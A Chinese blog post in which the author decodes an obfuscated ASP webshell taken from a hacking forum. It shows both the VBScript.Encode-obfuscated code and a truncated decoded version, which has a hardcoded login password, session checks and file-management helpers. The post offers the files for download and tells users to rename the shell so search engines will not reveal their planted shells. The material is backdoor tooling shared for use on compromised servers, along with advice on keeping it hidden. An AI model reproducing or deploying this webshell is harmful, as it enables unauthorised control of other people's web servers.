• 欢迎访问金刀客博客!
  • 2019,春节快乐!

解密的综合新版webshell

原创天空 admin 15426次浏览 已收录 1个评论

近日在暗组瞎逛,在工具下载区看到看到一个综合新版Webshell (asp),界面比较朴质,简介,不张扬,符合我的爱好,一看加密了,决定解密之。暗组的帖子地址:http://forum.darkst.com/thread-36940-1-2.html
加密页面:

<%@ LANGUAGE = VBScript.Encode %>
<%#@~^3NYBAA==@#@&?nM\DRUmMrwDKr:W;O{,,O1,O,,O~~P,B防止脚本超时@#@&]+d2Kxd+c$E60n.,'Y.;dv缓冲一b1Ob\n,?D\D,KlT+。回应只到某一页结束或]+kwGUk+RwsEkt或Id2W /R3x[方法调用时才发送出去。@#@&rUPA.DKD~]/Ehn,1n6D7E容错@#@&@#@&@#@&D:,x'{'x'{'xx{''{x'{''{xx'{'{'x'xx{'x'{x'{'xx{''x@#@&B全局变量部分@#@&MnsPx{'{''{'{x'{'x'{'xx{''{x'{''{xx'{'{'x'xx{'x'{x@#@&@#@&v[aa::[a:a[:[a:[a[aa[a[:a[a:a[a::[aa[:a[aa[::a[a[a@#@&v;MV~得到当前地址@#@&v/D-nMkw~服务器ra@#@&BMGKY2mY4P站点根目录@#@&BSAhalOt,本程序目录@#@&vmmYbGx,提交的动作@#@&E2Cm0+DxC:n~打包文件名称@#@&vqsL2XY~常见图片文件后缀@#@&BKaOA6OP常见文本文件后缀@#@&EIn6D/t~l1VP为返回显示文件的页面,并自动刷新@#@&B(l^V!DV,普通的返回@#@&Ej/.Klk/,登陆密码@#@&Bjo^lLPkn/kkGU的标识@#@&BrdG+8ET\KNn,smV/~:.E是否调试模式@#@&B[a::[aa[:a[aa[::a[a[a:a::[a:a[:a[a::[aa::[a:a[:[a@#@&Nb:P`IdS?D-+MqKS"WWDKlDt~q nmY4~)mOrKxSnm^3YHCs+~]n6Dn/4$mmVBAmm3`D^S3T+@#@&`IJ7id',]+$E+kO ?D7+..C.bl8Vd`rj]Jr#@#@&jD-+M(hdx,I;E/D ?D-+M.C.bl4^n/vJS}/)S|bGf]Jb@#@&IGWDKlDt7x,/+.-D Hm2hlO4`rRJ*@#@& qIGWDd7x,?+M-+MRHm2KlDtvJ&Jb@#@&l^YbGxidx~"+;;nkYcJm^DkG J*@#@&wW^[+MnCY4dx~"+;!n/D`JwGsNDhlOtEb@#@&o1mh+idx~"+;;nkYcJwHm:nr#@#@&3T+{E@!(D@*@!(D@*@!(D@*@!8D@*@!4M@*@!4M@*@!4.@*@!8M@*E@#@&]+6Dnd4Al^Vi'~J@!hYC,tDYw +$;k7'vD0.nktB,^W Y+ O~',Byi~j]J{g)mDrW 'j4KhFor^+vP@*E@#@&v定义登陆及k+k/kKx等@#@&Nb:~jk+.Km//Bjs^loB(hoA6DBSKaOA6O~bdf4;LtWNn@#@&?4+^sglhd{J综合新版h4k4+^VE@#@&jdnMnlkdd{PJdG-+^+k/E@#@&/KwzDbLtDdxE无版权r@#@&jo^lLdix,JJK\V+k/r@#@&b/9+(EL\KN+,xPwlVkn@#@&Eqso36O7i'~JfLk6^%2T^4h2fJ@#@&EPXY3XYid',Jf-4k^sWT^Cda^YXO^atwfrUkfk mytOhftO:^y6sVy^Kx0y^KxWkTyN/2fLm\lftDO^^/O^m/2afwtaf^atwWy%/fmk/y4COfldlfE@#@&@#@&@#@&D+h~{'x'{x{'x{'{''{'{x'{'x'{'xx{''{x'{''{xx'{'{'x'@#@&E通用函数部分@#@&DhP{'xx{''xx{'x'{x{'x{'{''{'{x'{'x'{'xx{''{x'{''{@#@&@#@&Bm4W函数@#@&UE8P^tK`dOM#@#@&./2W dR MkD+`kYMb@#@&2UN,?;8@#@&@#@&v错误显示@#@&?E(~jtKhAD.`b@#@&P~q6~2MD~P4+x@#@&,P~P^4WE@!4M@*@!mP4.+6'vLm\Cd1DkaO)4k/DG.Xc4mmV`bv@*@!8D@*'x(/2IrP[~3MD fd1DraYbWx,[,E@!Jl@*@!(D@*E@#@&P,~PADDc/s+mD@#@&7IndaWU/ s^Ed4@#@&P~3 N~q67i@#@&Ax9P?!4@#@&@#@&djE(Pj4Kh2M. v/YMb@#@&idGkhPrS,l.Dmz?DD@#@&id/O.,'~?.7+.cCD:VAx1GN`dYM#@#@&idlM.lH?YM~xPUw^kO`dOM~~JfyJ*@#@&@#@&ddn^4W~J@!WKxO,/by+{ @*E@#@&d7+1tG~r出错信息)@!(.z@*@!4M&@*J@#@&idoW.~bPxPZ~KKPi$KEx[cmD.lHjDDb@#@&iddm4GPr[U4kwI' 4/aIJ,[Pvr~_,F*P'PE ,J~[,CDMlzjDD`rb,[~J@!8Mz@*r@#@&ddg+XO@#@&d7+1tG~r@!z6GxD@*J@#@&@#@&id"+dwGUk+ 2 [`*@#@&7AxN~j!47@#@&@#@&B超时检测@#@&?!4P1t^3v#@#@&iqW~U+/krW `J`dnDhlk/E#~@!@*Pi/.nm/d~:t+U@#@&d7+14KPE@!/1DkaY@*CVDO`E没有权限的访问~请先登录Zv*i@!JdmMkwD@*E@#@&Bid^lss,VGoK;Yv#@#@&i2x[~&0@#@&AU9Pj!4@#@&@#@&B路径替换@#@&s!x^YbWU~"+nmOtv?#@#@&~P"+hlOtx]wsl1n`U~Ewr~Jwwr#@#@&AU9Po!x1YkKx@#@&@#@&s;x1YrG PI"nnmYtvjb@#@&P,I]+KCDtxI2VmmncU~Jwwr~E-rb@#@&3 N,sE mDrW @#@&@#@&@#@&vbk0函数@#@&s!xmDrGx,q&0c\C.BP-l^q~,\Csy#@#@&7&0~\m.,'~:D!+P:tU@#@&d7q&0~x,\l^q@#@&dPAsd+@#@&id(qW~{P-l^+@#@&d3U9PqW@#@&2UN,o!x^DkKx@#@&B文件大小@#@&s!x^YbWU~V+Y:4+UkycUEs#@#@&7d9rsPr~,CDH?r"`cb@#@&d7lMzUk"`Z#P{Pr$J@#@&7dmDzjby+vq#,'PrFE@#@&dil.Xjr.+c *~',J\E@#@&d7CMXjk.nv&b,',JMr@#@&7dmDz?byncW#P{~J:J@#@&774k^+cx;h,z~FZ+c,@*x~8#@#@&7idUEs~{Pob6vxEsPJ~FZ *PCPqTZ#PJ~FZ!@#@&77dbP{PrPQ~8@#@&di 2 N@#@&idMnO:tn?b"Px,x!:PLPr~J,[~lMXjr.+`bb@#@&2x9~oE mDkGx@#@&@#@&vtDUV编码转换@#@&o; mYrG PuYssAx^KN`/DD*@#@&id(0,qdH!VVvdYM#P:4nx,2XkOPo; mOkKU@#@&d7uD:V3U1W[+,x,?nM\DR_KtJ2 mGN`dOM#@#@&72 NPw;UmDkKx@#@&@#@&E?n/krW sGs9+YjnDPd+kdbWU文件夹设置@#@&E?E(PUo/Yc#@#@&(W,sW^[+MnlD4@!@*rJ,Y4+U@#@&P~?d/bWUcrsWs[DKlD4r#x"InlDtvoW^NnDhlO4*@#@&AUN,q0@#@&(0,?/dkGUvJoW^[+MnCO4J#xErPPtU@#@&~,sKVNDhCY4']WKYKCDt@#@&~PU+/krGxvJwWsNn.hlOtrb'wWs[DnCO4@#@&2 [,kW@#@&E2x9PU;4@#@&@#@&E添加菜单@#@&v6Ex1OkKxPtnUEmN9`dYzs~[kMStM+WSs+x;SbmG#@#@&6EU1YbWx,:UEmN[`Dl.LY~4.+6~YXOSmKVKDS/r"Bk^W*7dEYC.T+Y提交的目标,[rM目录,t.+6连接,OXY显示,^KVKD图标颜色,/by图标大小,b^W图标代码@#@&7k6Pdr.'!,Otx@#@&77/by{JE@#@&7Vd+@#@&di/r"{JPdr.+xBr'Uk"LJEJ@#@&dUN,kW@#@&drW,mW^GD{JJ,O4+ .................................................................................

解密页面:

<%@ LANGUAGE = VBScript %>
<% Server.ScriptTimeout=999999999 '防止脚本超时 Response.Buffer =true '缓冲一Active Server Page。回应只到某一页结束或Response.Flush或Response.End方法调用 时才发送出去。 On Error Resume Next '容错 rem ============================================== '全局变量部分 rem ============================================== '################################################# 'url 得到当前地址 'serverip 服务器ip 'rootpath 站点根目录 'wwwpath 本程序目录 'action 提交的动作 'packetname 打包文件名称 'ImgExt 常见图片文件后缀 'TxtExt 常见文本文件后缀 'RefreshBack 为返回显示文件的页面 并自动刷新 'backurl 普通的返回 'UserPass 登陆密码 'SFlag session的标识 'isDebugMode False,True是否调试模式 '################################################# dim URL,ServerIP,RootPath,WWWPath,Action,PacketName,RefreshBack,BackUrl,kge URL = Request.ServerVariables("URL") ServerIP = Request.ServerVariables("LOCAL_ADDR") RootPath = server.MapPath(".") WWWRoot = Server.MapPath("/") action = Request("action") FolderPath = Request("FolderPath") FName = Request("FName") kge=" ” RefreshBack = “
‘定义登陆及session等
dim UserPass,SFlag,ImgExt’,TxtExt,isDebugMode
ShellName =”Oh,god”
UserPass = “6570189”
Copyright =”It is my Gift God give to me”
SFlag = “god”
isDebugMode = False
‘ImgExt = “$gif$jpg$bmp$”
‘TxtExt = “$vbs$log$asp$txt$php$ini$inc$htm$html$xml$conf$config$jsp$java$htt$lst$aspx$php3$php4
$js$css$bat$asa$”
rem ==============================================
‘通用函数部分
rem ==============================================
‘echo函数
Sub echo(str)
response.Write(str)
End Sub
‘错误显示
Sub ShowErr()
If Err Then
echo”

 ” & Err.Description & “


Err.Clear
Response.Flush
End If
End Sub
Sub ShowErr2(str)
Dim i, arrayStr
str = Server.HtmlEncode(str)
arrayStr = Split(str, “$$”)
echo “
echo “出错信息:


For i = 0 To UBound(arrayStr)
echo ”  ” & (i + 1) & “. ” & arrayStr(i) & “

Next
echo “

Response.End()
End Sub
‘超时检测
Sub check()
If Session(“UserPass”) <> UserPass Then
echo “
‘ call logout()
End If
End Sub
‘路径替换
Function RePath(S)
RePath=Replace(S,”\”,”\\”)
End Function
Function RRePath(S)
RRePath=Replace(S,”\\”,”\”)
End Function
‘iif函数
Function IIf(var, val1, val2)
If var = True Then
IIf = val1
Else
IIf = val2
End If
End Function
‘文件大小
Function GetTheSize(num)
Dim i, arySize(4)
arySize(0) = “B”
arySize(1) = “K”
arySize(2) = “M”
arySize(3) = “G”
arySize(4) = “T”
While(num / 1024 >= 1)
num = Fix(num / 1024 * 100) / 100
i = i + 1
WEnd
GetTheSize = num & ” ” & arySize(i)
End Function
‘htnl编码转换
Function HtmlEncode(str)
If IsNull(str) Then Exit Function
HtmlEncode = Server.HTMLEncode(str)
End Function
‘SessionFoldetSet session文件夹设置
‘Sub SFset()
If FolderPath<>“” then
Session(“FolderPath”)=RRePath(FolderPath)
End If
If Session(“FolderPath”)=”” Then
FolderPath=RootPath
Session(“FolderPath”)=FolderPath
End if
‘End Sub
………………………………………..

使用这个shell的朋友建议把ShellName改掉哦,不然google一搜,你的shell全出来了。
惭愧,刚刚发现这个解密的shell和我先前下载的一个shell一样的,解密的应当是那个朋友的加密shell了,但是我解密的这个shell多了31字节,哈哈。开始我还以为那个shell没有这个加密的shell功能全面呢,做了一回无用功,可不解密谁知道呢?
加密及解密文件
点击下载此文件


金刀客博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权 , 转载请注明解密的综合新版webshell
喜欢 (2)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到
(1)个小伙伴在吐槽
  1. 刀哥能不能说一下怎么解密的? 一般的encoder解开来最后还是有一段加密的代码。 能不能提示一下? [reply=admin,2009-12-20 00:27 AM]发了文章的,你看下 http://www.daokers.com/article/original/562.htm[/reply]
    能说下怎么解密的麽2009-12-19 15:42 回复